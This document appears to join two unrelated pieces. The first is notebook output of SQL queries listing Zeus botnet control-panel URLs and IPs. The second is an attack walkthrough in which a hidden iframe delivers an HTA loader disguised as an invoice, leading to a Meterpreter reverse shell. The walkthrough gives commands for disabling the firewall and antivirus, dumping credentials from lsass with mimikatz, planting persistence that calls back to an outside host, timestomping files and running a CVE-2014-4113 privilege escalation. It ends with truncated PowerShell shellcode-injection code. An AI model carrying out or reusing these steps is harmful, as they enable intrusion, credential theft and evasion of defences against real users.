1425 zdemo.mooo.com/zeus/cp.php?m=login 1
1426 zohaibbeauty.com/load/cp.php?m=login 1
1427 zokah.dk/e777/cp.php?m=login 1
1428 zukkoshop.su/cp.php?m=login 1
1429 zxjfcvfvhqfqsrpz.onion/~ifybo/zeu5/r/cp.php?m=... 1
1430 zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap... 1
1431 zxjfcvfvhqfqsrpz.onion/~mekzi/ali-pay_com/1/cp... 1
1432 zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c... 1
1433 zxjfcvfvhqfqsrpz.onion/~mekzi/manuchimso_com/3... 1
1434 zxjfcvfvhqfqsrpz.onion/~mekzi/mekzi-logs_com/4... 1
1435 zxjfcvfvhqfqsrpz.onion/~mekzi/oluwa-involved_c... 1
1436 zxjfcvfvhqfqsrpz.onion/~nelson/crome/1/cp.php?... 1
1437 zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/1/cp.ph... 1
1438 zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/cp.php?... 1
1439 zxjfcvfvhqfqsrpz.onion/~nelson/new1/1/cp.php?m... 1
1440 zxjfcvfvhqfqsrpz.onion/~new/lmao/123/cp.php?m=... 1
1441 zxjfcvfvhqfqsrpz.onion/~new/paper-chasing-4lyf... 1

[1442 rows x 2 columns]
In [34]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_TOR_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%onion%' GROUP BY url ORDER BY 'num_of_TOR_ZeusC2'", conn)
print df
                                                  url  num_of_TOR_ZeusC2
0 3qwajq5p5pfsi3sw.onion/~ogbeni1/one/admin.php?... 1
1 ismjiope3jmwagf3.onion/cp.php?m=login 1
2 kdsk3afdiolpgejs.onion/sphinx/cp.php?m=login 1
3 zxjfcvfvhqfqsrpz.onion/~ifybo/zeu5/r/cp.php?m=... 1
4 zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap... 1
5 zxjfcvfvhqfqsrpz.onion/~mekzi/ali-pay_com/1/cp... 1
6 zxjfcvfvhqfqsrpz.onion/~mekzi/log-bank_com/2/c... 1
7 zxjfcvfvhqfqsrpz.onion/~mekzi/manuchimso_com/3... 1
8 zxjfcvfvhqfqsrpz.onion/~mekzi/mekzi-logs_com/4... 1
9 zxjfcvfvhqfqsrpz.onion/~mekzi/oluwa-involved_c... 1
10 zxjfcvfvhqfqsrpz.onion/~mine/cloudns_org/1/min... 1
11 zxjfcvfvhqfqsrpz.onion/~nelson/crome/1/cp.php?... 1
12 zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/1/cp.ph... 1
13 zxjfcvfvhqfqsrpz.onion/~nelson/ebere/1/cp.php?... 1
14 zxjfcvfvhqfqsrpz.onion/~nelson/new1/1/cp.php?m... 1
15 zxjfcvfvhqfqsrpz.onion/~new/lmao/123/cp.php?m=... 1
16 zxjfcvfvhqfqsrpz.onion/~new/paper-chasing-4lyf... 1
In [38]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_COM_ZeusC2_domains' FROM ZeusC2Tracker WHERE url LIKE '%.com%' GROUP BY url ORDER BY 'num_of_COM_ZeusC2_domains'", conn)
print df
                                                    url  \
0 039b1ee.netsolhost.com
1 03a6b7a.netsolhost.com
2 03a6b7a.netsolhost.com/order/server/cp.php?m=l...
3 03a6f57.netsolhost.com
4 03a6f57.netsolhost.com/shoes/cp.php?m=login
5 03bbec4.netsolhost.com
6 03bbec4.netsolhost.com/udo/cp.php?m=login
7 23445778889.com/best/new/mii/test/metro/admin/...
8 23452246.com/off/new/sale/metro/admin/1/cp.php...
9 24411244.com/sales/new/cp.php?letter=login
10 24411244.com/thanks/metro/admin/1/cp.php?lette...
11 2becomputers.com
12 2becomputers.com/conta/cp.php?m=login
13 345688776.com/inhere/new/test/metro/admin/1/cp...
14 3addictions.com.au/Attach/kings/cp.php?m=login
15 3d-gold.com.hk/img/admin.php?m=login
16 4455667778.com/new/seen/metro/admin/1/cp.php?l...
17 454545663.com/kc/new/metro/admin/1/cp.php?lett...
18 454545663.com/mic/test/metro/admin/1/cp.php?le...
19 55566785677.com/new/test/metro/admin/1/cp.php?...
20 6667788899ii.com/test/here/fr/metro/admin/1/cp...
21 6pjddrtt7.com
22 6pjddrtt7.com/chrome/cp.php?m=login
23 92.240.69.54/~busletak/alibaba.com/sexydon/ser...
24 a2wpress.com/wp-admin/js/commonjs/cp.php?m=login
25 abcdigitizing.com/images/good/cp.php?m=login
26 aboniaamckdr.com/emman/cp.php?m=login
27 aboniaamckdr.com/gabby/cp.php?m=login
28 aboniaamckdr.com/html/cp.php?m=login
29 aboniaamckdr.com/public/cp.php?m=login
... ...
1062 x65cr13.com/bb/cp.php?m=login
1063 xinsaer.com/w58/cp.php?m=login
1064 xpertitsol.com/db1/cp.php?m=login
1065 y7online.com/ftp/cp.php?m=login
1066 yahoo-action.com
1067 yakinfetih.com/js/cp.php?m=login
1068 yamalandgeorge.com/vtr/serverphp/cp.php?m=login
1069 yamleg.fu8.com
1070 yamleg.fu8.com/acho/cp.php?m=login
1071 yamleg.fu8.com/dan/cp.php?m=login
1072 yamleg.fu8.com/em/cp.php?m=login
1073 yamleg.fu8.com/ik/cp.php?m=login
1074 yamleg.fu8.com/xx/cp.php?m=login
1075 yapanyapi.com/katolog/thumbs/panel/cp.php?m=login
1076 yasamaugrasi.com/wp-includes/images/media/cp.p...
1077 yilinmilletvekili.com/Blast/serverphp/cp.php?m...
1078 yilmazcelikservis.com.tr/images/admin.php?m=login
1079 yogicmanagement.com/wp-admin/jss/cp.php?m=login
1080 youngshoipstory.com/metro/admin/1/cp.php?lette...
1081 youronlinecasinobonuses.com/k/cp.php?m=login
1082 yumcsupply.com/st/cp.php?m=login
1083 yysopqde.com/panel/Panel/cp.php?m=login
1084 z0bu.dynu.com
1085 zdemo.mooo.com/zeus/cp.php?m=login
1086 zeditsolutions.com.au
1087 zetes.vdsinside.com
1088 zeus.guvencelikimalat.com
1089 zeusbotnet.net.onebigfishgreenevents.com/cody/...
1090 zitoskillslimited.com/latest/Panel/cp.php?lett...
1091 zohaibbeauty.com/load/cp.php?m=login

num_of_COM_ZeusC2_domains
0 1
1 1
2 1
3 1
4 1
5 1
6 1
7 1
8 1
9 1
10 1
11 1
12 1
13 1
14 1
15 1
16 1
17 1
18 1
19 1
20 1
21 1
22 1
23 1
24 1
25 1
26 1
27 1
28 1
29 1
... ...
1062 1
1063 1
1064 1
1065 1
1066 1
1067 1
1068 1
1069 1
1070 1
1071 1
1072 1
1073 1
1074 1
1075 1
1076 1
1077 1
1078 1
1079 1
1080 1
1081 1
1082 1
1083 1
1084 1
1085 1
1086 1
1087 1
1088 1
1089 1
1090 1
1091 1

[1092 rows x 2 columns]
In [40]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Zeus_ZeusC2_domains' FROM ZeusC2Tracker WHERE url LIKE '%zeus%' GROUP BY url ORDER BY 'num_of_Zeus_ZeusC2_domains'", conn)
print df
                                                  url  \
0 0x.x.gg/zeus/adm/index.php?m=login
1 23.252.120.143/~zeus/30/cp.php?letter=login
2 357.toh.info/zeus/admin.php?m=login
3 amk.dynvpn.de/zeus/cp.php?m=login
4 blackhill.pp.ua/zeus/cp.php?m=login
5 celenit-idiomas.com.br/zeus7/cp.php?m=login
6 circleread-view.com.mocha2003.mochahost.com/Ze...
7 crudeoil.company/zeus/server/cp.php?m=login
8 darkzeusbtnet.netsons.org/pony/admin.php
9 epsyium.com/zeus/
10 face2face-nig.biz/zeus/cp.php?m=login
11 frugaliasdelivery.com/coco/zeus/cp.php?letter=...
12 perupublica.com/service/mmbb-zeus/adminpanel/a...
13 quattromexico.com/db121/zeus%202.1.0.1/server%...
14 rams3s.org/zeus/cp.php?m=login
15 rbsfinancials.com/Zeus/server_php/cp.php?m=login
16 www.crudeoil.company/zeus/server/cp.php?m=login
17 zdemo.mooo.com/zeus/cp.php?m=login
18 zeus.guvencelikimalat.com
19 zeusbotnet.net.onebigfishgreenevents.com/cody/...

num_of_Zeus_ZeusC2_domains
0 1
1 1
2 1
3 1
4 1
5 1
6 1
7 1
8 1
9 1
10 1
11 1
12 1
13 1
14 1
15 1
16 1
17 1
18 1
19 1
In [41]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_UAZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.ua%' GROUP BY url ORDER BY 'num_of_UAZeusC2'", conn)
print df
                                                  url  num_of_UAZeusC2
0 247.kiev.ua/love/ssss/ssss/cp.php?m=login 1
1 avita.lviv.ua/.tmp/cp.php?m=login 1
2 barfly.com.ua/tito/cp.php?m=login 1
3 berizka.gorodok.km.ua/core/auth/image/cp.php?m... 1
4 berizka.gorodok.km.ua/core/splash/admin/cp.php... 1
5 bestdove.in.ua 1
6 bestdove.in.ua/first/admin.php?m=login 1
7 blackhill.pp.ua 1
8 blackhill.pp.ua/zeus/cp.php?m=login 1
9 counter-1.adscounter.com.ua 1
10 ecoed.com.ua/.smart/Plugins/cp.php?letter=login 1
11 excel.com.ua/image/cp.php?letter=login 1
12 fortuna-group.com.ua/wp-comment/admin.php?m=login 1
13 hallabu.in.ua/index/admin.php?m=login 1
14 henex.net.ua 1
15 ice.andromed.in.ua 1
16 jomo.in.ua 1
17 loxomi.in.ua/index/admin.php?m=login 1
18 molowo.in.ua 1
19 mygoodness.in.ua 1
20 numogi.in.ua/index/admin.php?m=login 1
21 rest-mlyn.com.ua/includes/db/server/cp.php?m=l... 1
22 sauti.com.ua/var/cp.php?m=login 1
23 sdhfjksdhfjksdh.biz.ua 1
24 sdspropro.co.ua 1
25 smarthous.com.ua/wp-includes/components/plugin... 1
26 vashadvokat.in.ua 1
27 vip-interior.com.ua/e7/cp.php?m=login 1
28 visit2013.in.ua 1
29 vlad-poltava.1gb.ua/cp.php?m=login 1
30 www.coolfox.pp.ua/adminpanel/facts/cp.php?m=login 1
31 www.fvs.com.ua/tw/cp.php?m=login 1
32 www.pneumatica.com.ua/tmp/.tmp/cp.php?m=login 1
33 www.renomed.org.ua/components/shby/cp.php?m=login 1
34 www.sdspropro.co.ua 1
35 www.windelectric.ua/images/gh/cp.php?letter=login 1
In [42]:
df = pd.read_sql_query("SELECT url, COUNT(*)  FROM ZeusC2Tracker WHERE url LIKE '%.us%' GROUP BY url ORDER BY 'num_of_US_ZeusC2'", conn)
print df
                                                  url  num_of_US_ZeusC2
0 blueinteractive.us/wp-comment/cp.php?m=login 1
1 freecashmachine.us/monib/cp.php?m=login 1
2 jerryguy.usa.cc/css/panel.php?letter=login 1
3 joejdbjrmrkklfnmf.usr.me 1
4 jpardon.usa.cc/xxc/admin.php?m=login 1
5 landsolutions.us/morganbreaux.com/temp/nepal/c... 1
6 ngtools.us/s/cp.php?m=login 1
7 nyprince.us/gift/item/cp.php?m=login 1
8 shieldled.us/ak47/cp.php?m=login 1
9 shieldled.us/akguy/cp.php?m=login 1
10 shieldled.us/ste/cp.php?m=login 1
11 w1sdom.us/13377/cp.php?m=login 1
12 westiniedsho.us/eme01/cp.php?m=login 1
13 wizboi.us/eme01/cp.php?m=login 1
14 www.global-production.us/longman/edition/cp.ph... 1
15 www.marshall.usa.cc/war/panel.php?m=login 1
In [43]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_CC_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.cc%' GROUP BY url ORDER BY 'num_of_CC_ZeusC2'", conn)
print df
                                                 url  num_of_CC_ZeusC2
0 astairepartners.cu.cc/pelumi/server/cp.php?m=l... 1
1 g0dday.cc/cp.php?m=login 1
2 jerryguy.usa.cc/css/panel.php?letter=login 1
3 jpardon.usa.cc/xxc/admin.php?m=login 1
4 www.marshall.usa.cc/war/panel.php?m=login 1
5 www.wideawake.cc/zak/cp.php?letter=login 1
In [44]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_SU_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.su%' GROUP BY url ORDER BY 'num_of_SU_ZeusC2'", conn)
print df
                                                  url  num_of_SU_ZeusC2
0 76tguy6hh6tgftrt7tg.su 1
1 angryshippflyforok.su 1
2 axpoium.echange.su 1
3 beatyhousesupporte.su 1
4 beautyinthesands.su/lisa/cp.php?m=login 1
5 bentleyoil.su/lamborghini/roseroll/cp.php?m=login 1
6 bentleyoil.su/rangeroversport/prosperity/cp.ph... 1
7 bitters.su 1
8 bright.su 1
9 chemosales.bzs.su/site/root/cp.php?m=login 1
10 chezhiyasweheropasl.su 1
11 cosmosdady.su 1
12 despww.su/3836bkuta3/index.php?m=login 1
13 f8b2b9.su 1
14 getego.suroot.com/~focused/wp-content/themes/t... 1
15 liberstotusedis.su/het/cp.php?m=login 1
16 livinglounges.su 1
17 meziamussucemaqueue.su/ihavethepower/ 1
18 nonstopeddanceraz.su 1
19 pedropedreiromoxik.su 1
20 regame.su 1
21 rsslessons.su 1
22 slot.sub-zero.it 1
23 turkeyhotelnoslafas.su 1
24 uptight.su 1
25 wvin.su 1
26 zukkoshop.su/cp.php?m=login 1
In [45]:
df = pd.read_sql_query("SELECT url, COUNT(*) as 'num_of_Gov_ZeusC2' FROM ZeusC2Tracker WHERE url LIKE '%.gov%' GROUP BY url ORDER BY 'num_of_Gov_ZeusC2'", conn)
print df
                                                 url  num_of_Gov_ZeusC2
0 ayancikmuftulugu.gov.tr/admin/cp.php?m=login 1
1 teatromunicipal.gov.co/images/indexx.php?lette... 1
In [20]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT (*) FROM ZeusC2Tracker GROUP by ip HAVING COUNT(*) > 1 ORDER by COUNT(*) DESC", conn)
print df
          mdate               ip  \
0 2013-05-22
1 15-05-2013 199.192.231.250
2 15-06-2015 198.1.80.203
3 21-11-2014 162.144.127.104
4 25-09-2013 64.32.14.163
5 22-04-2014 64.32.20.103
6 14-07-2015 198.57.188.172
7 28-08-2014 46.149.111.10
8 2015-12-10 198.105.221.5
9 31-10-2014 162.144.120.105
10 23-07-2014 162.144.94.245
11 29-06-2015 176.119.28.73
12 2015-09-13 122.155.3.150
13 04-10-2014 194.201.253.5
14 23-03-2014 204.188.238.141
15 04-05-2013 205.251.133.130
16 21-05-2014 64.31.43.138
17 11-05-2014 186.202.127.48
18 19-10-2014 194.201.253.2
19 2015-02-01 195.16.127.102
20 19-11-2013 198.176.28.49
21 27-10-2013 205.251.135.234
22 2015-10-22 209.200.232.14
23 09-06-2014 95.173.183.91
24 01-08-2014 141.105.68.108
25 12-11-2014 167.160.46.7
26 11-07-2013 207.210.103.242
27 04-10-2014 91.236.74.162
28 27-09-2014 94.242.205.226
29 01-06-2014 103.28.15.136
.. ... ...
261 18-09-2013 67.205.74.119
262 30-11-2014 67.228.98.175
263 19-05-2014 69.167.162.69
264 2014-06-28 69.194.235.103
265 27-04-2014 69.27.107.94
266 17-08-2012 69.28.199.110
267 02-11-2015 69.28.199.60
268 2015-12-12 69.4.233.96
269 28-11-2014 69.64.61.199
270 26-12-2013 72.9.108.202
271 04-11-2012 74.81.82.234
272 2014-07-17 77.55.125.205
273 19-09-2014 81.196.156.218
274 13-05-2014 81.88.48.95
275 2015-12-12 83.98.177.7
276 15-05-2014 85.95.238.136
277 04-07-2014 87.247.179.190
278 2015-08-10 87.98.146.77
279 24-09-2015 89.233.106.130
280 11-03-2014 89.248.161.233
281 20-08-2014 91.197.129.190
282 14-07-2014 91.223.82.107
283 30-05-2014 91.223.82.188
284 27-10-2014 91.223.82.85
285 25-09-2014 91.236.74.183
286 08-07-2014 92.240.69.54
287 29-07-2014 93.190.95.7
288 14-03-2014 94.102.48.94
289 01-08-2014 95.173.183.232
290 12-09-2013 98.130.96.2

url COUNT (*)
0 199.7.234.100 509
1 os.qintec.sk/images/stories/rolex/cp.php?m=login 26
2 kendra.fr/panel/cp.php?m=login 21
3 ganhedwakar.tk/giveittome/getoff/cp.php?m=login 16
4 kingroygold.in/server/cp.php?m=login 15
5 sp4m.ru/11/cp.php?m=login 15
6 festusca.in/maha/cp.php?m=login 14
7 zxjfcvfvhqfqsrpz.onion/~lemore/log-needed-asap... 14
8 phoenixtsi.com 13
9 muazymaur.tk/maurice/cp.php?m=login 12
10 obinnaeku.biz/wordpress/wp-includes/js/crop/ob... 12
11 emailsclient.com/am/cp.php?m=login 11
12 techjoe.cricket 10
13 www.nacosti.go.ke/components/com_users/hhghg/c... 9
14 nitenokliert.co.uk/sat/cp.php?m=login 9
15 208.98.18.41/zoey/index/kop/uyi/rob/cp.php?m=l... 9
16 kioskcantinhodaroca.com.br/wp-content/uploads/... 9
17 herminiametzler.com.br/wp-content/themes/twent... 8
18 oakparkltd.com/user/cp.php?m=login 8
19 islenpiding.hotmail.ru 8
20 r-sbonline.biz/images/task/cp.php?m=login 8
21 urbinarojas.com/update/cp.php?m=login 8
22 molowo.in.ua 8
23 buharasifa.com/san/cp.php?m=login 8
24 www.iut.sx/webstat/cp.php?m=login 7
25 55566785677.com/new/test/metro/admin/1/cp.php?... 7
26 revrakdesign.ca/zcp/cp.php?m=login 7
27 danbeta.ru/g2/cp.php?m=login 7
28 newbetrrsearve.co.uk/us/serverphp/cp.php?m=login 7
29 dinamikamandiri.co.id/e7/cp.php?m=login 6
.. ... ...
261 autopartsgene.com/wp-admin/css/cp.php?m=login 2
262 malika.nu/css/cp.php?m=login 2
263 electroingenieria.mx/images/culture/adminpanel... 2
264 58.195.1.4 2
265 it-support-calgary.ca/999/cp.php?m=login 2
266 95.65.107.94/web/cp.php?m=login 2
267 cheshamfrench.co.uk/digits1/server/cp.php?m=login 2
268 tekchuks.xyz 2
269 pivetamaqfer.com.br/.htm/cp.php?letter=login 2
270 artskit.in/ven/cp.php?m=login 2
271 andyrog.net/vices/cp.php?m=login 2
272 joepussy.tk 2
273 trans-tech.ro/e7/cp.php?m=login 2
274 eyeofgod1.com/Zz/cp.php?m=login 2
275 ijoe.xyz 2
276 yilinmilletvekili.com/Blast/serverphp/cp.php?m... 2
277 kasasmock.com/media/system/cp.php?m=login 2
278 eresimgbo.com 2
279 eclpi.in/test/cp.php?m=login 2
280 viaialater.eu/ekpe/school.php?m=login 2
281 panorama-otel.ru/images/cp.php?letter=login 2
282 taiyuean.com/logs/1/cp.php?letter=login 2
283 foxmanwer.pw/new/logo/1/cp.php?letter=login 2
284 vogel-no0t.com/sage/vip/admin.php?m=login 2
285 oga-wale.com/robot/cp.php?letter=login 2
286 erberge-open.com/Media/plugin2/cp.php?m=login 2
287 panel7h.oxfrontal.com/aa/microupdate/madmin.ph... 2
288 supleather.biz/admincpanel/admin.php?m=login 2
289 pinglessmetin2.com/adam/cp.php?m=login 2
290 www.kueshen.biz/benson/cp.php?m=login 2

[291 rows x 4 columns]
In [18]:
df = pd.read_sql_query("SELECT mdate, ip, url, COUNT (*) as 'num_of_SameIP_ZeusC2' FROM ZeusC2Tracker GROUP by ip HAVING COUNT(*) > 1 ORDER by 'num_of_SameIP_ZeusC2' DESC", conn)
py.iplot([Bar(x=df.ip, y=df.num_of_SameIP_ZeusC2)], filename='Number of Same IP ZeusC2')
In [22]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%199.192.231.250%'", conn)
print df
         mdate               ip  \
0 07-10-2013 199.192.231.250
1 03-10-2013 199.192.231.250
2 03-10-2013 199.192.231.250
3 03-10-2013 199.192.231.250
4 26-09-2013 199.192.231.250
5 25-09-2013 199.192.231.250
6 18-09-2013 199.192.231.250
7 11-09-2013 199.192.231.250
8 10-09-2013 199.192.231.250
9 27-08-2013 199.192.231.250
10 26-08-2013 199.192.231.250
11 26-08-2013 199.192.231.250
12 20-08-2013 199.192.231.250
13 10-08-2013 199.192.231.250
14 04-07-2013 199.192.231.250
15 04-07-2013 199.192.231.250
16 02-07-2013 199.192.231.250
17 23-06-2013 199.192.231.250
18 23-06-2013 199.192.231.250
19 23-06-2013 199.192.231.250
20 20-06-2013 199.192.231.250
21 09-06-2013 199.192.231.250
22 08-06-2013 199.192.231.250
23 01-06-2013 199.192.231.250
24 31-05-2013 199.192.231.250
25 15-05-2013 199.192.231.250

url
0 newcollins.co.uk/collins/cp.php?m=login
1 www.imfssd.biz/images/_notes/e/cp.php?m=login
2 r-sbonlin.co.uk/images/gps/cp.php?m=login
3 createlognet.co.uk/collins/cp.php?m=login
4 deborenttt.co.uk/chinko/cp.php?m=login
5 atlantisexpressdelivery.co.uk/en/g/igw/cp.php?...
6 calmonstarn.co.uk/roland/cp.php?m=login
7 chogo16.com/.httaccess/.error_log/cp.php?m=login
8 fujiconstruction.com.vn/acce/cp.php?m=login
9 guilde-bleed.fr/images/site/gallery/set/files/...
10 clasek.de/wp-content/themes/upload/cp.php?m=login
11 59.157.4.2/~a/cp.php?m=login
12 www.mida12.com.br/files/cp.php?m=login
13 yamleg.fu8.com/acho/cp.php?m=login
14 jhl.com.pe/cuz/cp.php?m=login
15 tonytwalib.net/kalu/cp.php?m=login
16 secmontemilion.com/gJHFTfuyf==/cp.php?m=login
17 plymouthcoaches.co.uk/libraries/joomla/applica...
18 bte-online.org/ron/cp.php?m=login
19 bte-online.org/demo/cp.php?m=login
20 elenalana.com/tv/js/cp.php?m=login
21 llgames.com.br/.tmp/server/cp.php?m=login
22 207.45.176.90/~jhzceecm/myway2013/cp.php?m=login
23 www.sirimarka.com/wp-content/server/cp.php?m=l...
24 tr.childrenstorybook.eu/cp.php?m=login
25 os.qintec.sk/images/stories/rolex/cp.php?m=login
In [23]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%198.1.80.203%'", conn)
print df
         mdate            ip                                               url
0 06-07-2015 198.1.80.203 whiteandomke.in/html/30/cp.php?letter=login
1 06-07-2015 198.1.80.203 rnedek.at/2010/cp.php?m=login
2 06-07-2015 198.1.80.203 boyzkwete.in/kwete/cp.php?m=login
3 06-07-2015 198.1.80.203 bill-bones.com/web/cp.php?m=login
4 06-07-2015 198.1.80.203 bossmoney.xyz/everythingnice/cp.php?m=login
5 06-07-2015 198.1.80.203 vicenttours.com/html/cp.php?m=login
6 06-07-2015 198.1.80.203 andrewjohns.in/html/cp.php?m=login
7 06-07-2015 198.1.80.203 godassist.in/html/cp.php?m=login
8 06-07-2015 198.1.80.203 asonitsoft.com/html/cp.php?m=login
9 06-07-2015 198.1.80.203 thyssenkrrupp.com/html/cp.php?m=login
10 06-07-2015 198.1.80.203 tetraservcie.in/html/cp.php?m=login
11 06-07-2015 198.1.80.203 www.pimpword.in/june/July/cp.php?letter=login
12 06-07-2015 198.1.80.203 urchilaa.com/Aryas/cp.php?m=login
13 06-07-2015 198.1.80.203 mytonnymaxltd.net/images/melor/cp.php?m=login
14 06-07-2015 198.1.80.203 kendra.fr/walex/files/cp.php?m=login
15 06-07-2015 198.1.80.203 maxthingo.in/symboss2/cp.php?m=login
16 01-07-2015 198.1.80.203 boyzkwete.in/car/cp.php?m=login
17 29-06-2015 198.1.80.203 www.philipshotels.in/wordpress/AP/cp.php?m=login
18 29-06-2015 198.1.80.203 www.bigdaddygroup.in/nebro/cp.php?m=login
19 25-06-2015 198.1.80.203 dontknnowbuzz.in/html/cp.php?m=login
20 15-06-2015 198.1.80.203 kendra.fr/panel/cp.php?m=login

In [24]:
df = pd.read_sql_query("SELECT mdate, ip, url FROM ZeusC2Tracker WHERE ip LIKE '%162.144.127.104%'", conn)
print df
         mdate               ip  \
0 03-01-2015 162.144.127.104
1 03-01-2015 162.144.127.104
2 22-12-2014 162.144.127.104
3 19-12-2014 162.144.127.104
4 19-12-2014 162.144.127.104
5 19-12-2014 162.144.127.104
6 19-12-2014 162.144.127.104
7 19-12-2014 162.144.127.104
8 19-12-2014 162.144.127.104
9 12-12-2014 162.144.127.104
10 09-12-2014 162.144.127.104
11 03-12-2014 162.144.127.104
12 01-12-2014 162.144.127.104
13 01-12-2014 162.144.127.104
14 21-11-2014 162.144.127.104
15 21-11-2014 162.144.127.104

url
0 goodwellbeard.in/images/boy2/cp.php?m=login
1 goodluckfromgod.org/goodluck/Severphp/cp.php?l...
2 mybbtradeshos.in/html/30/cp.php?letter=login
3 vioss.in/server/cp.php?m=login
4 planstrazwes.biz/html/30/cp.php?letter=login
5 orientexpcs.org/panel/admin.php?m=login
6 mytoolstrade.biz/30/cp.php?letter=login
7 masertrades.biz/webindex/30/cp.php?letter=login
8 cossytrade.biz/index/30/cp.php?letter=login
9 demlogz2014.co.in/joey/PANEL/cp.php?letter=login
10 dumplog.biz/font/serverphp/cp.php?m=login
11 www.10-star-service.tk/funguy/cp.php?letter=login
12 kfc-online.tk/dondigit/cp.php?letter=login
13 ikpeego.biz/wp-includes/fonts/kc/cp.php?m=login
14 eurobikesbmw.tk/adminpanel/admin.php?m=login
15 ganhedwakar.tk/giveittome/getoff/cp.php?m=login

HTA Loader with Powershell Invocation -> System Compromise via CVE-2014-4113

Goal:

Simulate a sophisticated adversary by leveraging a compromised website hosting a zip archive via iframe with .hta loader with the PowerShell invocation leading to Meterpreter Reverse TCP Shell.

Steps: 

  • python unicorn.py windows/meterpreter/reverse_tcp hta (credits go to Dave Kennedy)
  • Serve the .hta loader as zipped “payment_invoice” with the encoded PowerShell at /var/www/html
Additional Metasploit Commands:
  • msfconsole – r unicorn.rb
  • meterpreter shell
  • getsid
  • getuid
  • migrate
  • getsystem
  • run killav
  • run checkvm
  • exploit Windows7 Service Pack 1 msp
  • use incognito
  • run countermeasure
  • run countermeasure –d –k
  • shell
    • netsh firewall set opmode disable //disable firewall
  • run vnc
  • load mimikatz
  • ls
  • upload /home/user/mimikatz.exe C:\\
  • timestop mimikatz.exe -f “C:\\Windows\System32\\cmd.exe”
  • shell
    • mimikatz.exe
    • privilege::debug
    • inject::process lsass.exe sekurlsa.dll
    • getLogonPasswords
    • sekurlsa::logonPasswords full
  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
  • attrib +h c:\autoexec.bat //make it hidden
  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

iframe Source code: 
 
<iframe id="frame" src="payment_invoice950123.zip” application=”yes” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no>>
 
Victim View
PowerShell Script:
 
$mcBY = ‘$kI9 = ”[DllImport(“kernel32.dll”)]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(“kernel32.dll”)]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(“msvcrt.dll”)]public static extern IntPtr memset(IntPtr dest, uint src, uint count);”;$w = Add-Type -memberDefinition $kI9 -Name “Win32” -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xda,0xc7,0xbe,0x87,0xd1,0x3a,0x4f,0xd9,0x74,0x24,0xf4,0x5f,0x33,0xc9,0xb1,0x47,0x31,0x77,0x18,0x83,0xc7,0x04,0x03,0x77,0x93,0x33,0xcf,0xb3,0x73,0x31,0x30,0x4c,0x83,0x56,0xb8,0xa9,0xb2,0x56,0xde,0xba,0xe4,0x66,0x94,0xef,0x08,0x0c,0xf8,0x1b,0x9b,0x60,0xd5,0x2c,0x2c,0xce,0x03,0x02,0xad,0x63,0x77,0x05,0x2d,0x7e,0xa4,0xe5,0x0c,0xb1,0xb9,0xe4,0x49,0xac,0x30,0xb4,0x02,0xba,0xe7,0x29,0x27,0xf6,0x3b,0xc1,0x7b,0x16,0x3c,0x36,0xcb,0x19,0x6d,0xe9,0x40,0x40,0xad,0x0b,0x85,0xf8,0xe4,0x13,0xca,0xc5,0xbf,0xa8,0x38,0xb1,0x41,0x79,0x71,0x3a,0xed,0x44,0xbe,0xc9,0xef,0x81,0x78,0x32,0x9a,0xfb,0x7b,0xcf,0x9d,0x3f,0x06,0x0b,0x2b,0xa4,0xa0,0xd8,0x8b,0x00,0x51,0x0c,0x4d,0xc2,0x5d,0xf9,0x19,0x8c,0x41,0xfc,0xce,0xa6,0x7d,0x75,0xf1,0x68,0xf4,0xcd,0xd6,0xac,0x5d,0x95,0x77,0xf4,0x3b,0x78,0x87,0xe6,0xe4,0x25,0x2d,0x6c,0x08,0x31,0x5c,0x2f,0x44,0xf6,0x6d,0xd0,0x94,0x90,0xe6,0xa3,0xa6,0x3f,0x5d,0x2c,0x8a,0xc8,0x7b,0xab,0xed,0xe2,0x3c,0x23,0x10,0x0d,0x3d,0x6d,0xd6,0x59,0x6d,0x05,0xff,0xe1,0xe6,0xd5,0x00,0x34,0x92,0xd0,0x96,0x77,0xcb,0xdb,0xa2,0x10,0x0e,0xdc,0x2b,0x5a,0x87,0x3a,0x7b,0xcc,0xc8,0x92,0x3b,0xbc,0xa8,0x42,0xd3,0xd6,0x26,0xbc,0xc3,0xd8,0xec,0xd5,0x69,0x37,0x59,0x8d,0x05,0xae,0xc0,0x45,0xb4,0x2f,0xdf,0x23,0xf6,0xa4,0xec,0xd4,0xb8,0x4c,0x98,0xc6,0x2c,0xbd,0xd7,0xb5,0xfa,0xc2,0xcd,0xd0,0x02,0x57,0xea,0x72,0x55,0xcf,0xf0,0xa3,0x91,0x50,0x0a,0x86,0xaa,0x59,0x9e,0x69,0xc4,0xa5,0x4e,0x6a,0x14,0xf0,0x04,0x6a,0x7c,0xa4,0x7c,0x39,0x99,0xab,0xa8,0x2d,0x32,0x3e,0x53,0x04,0xe7,0xe9,0x3b,0xaa,0xde,0xde,0xe3,0x55,0x35,0xdf,0xd8,0x83,0x73,0x95,0x30,0x10;$g = 0x1000;if ($z.Length -gt 0x1000){$g = 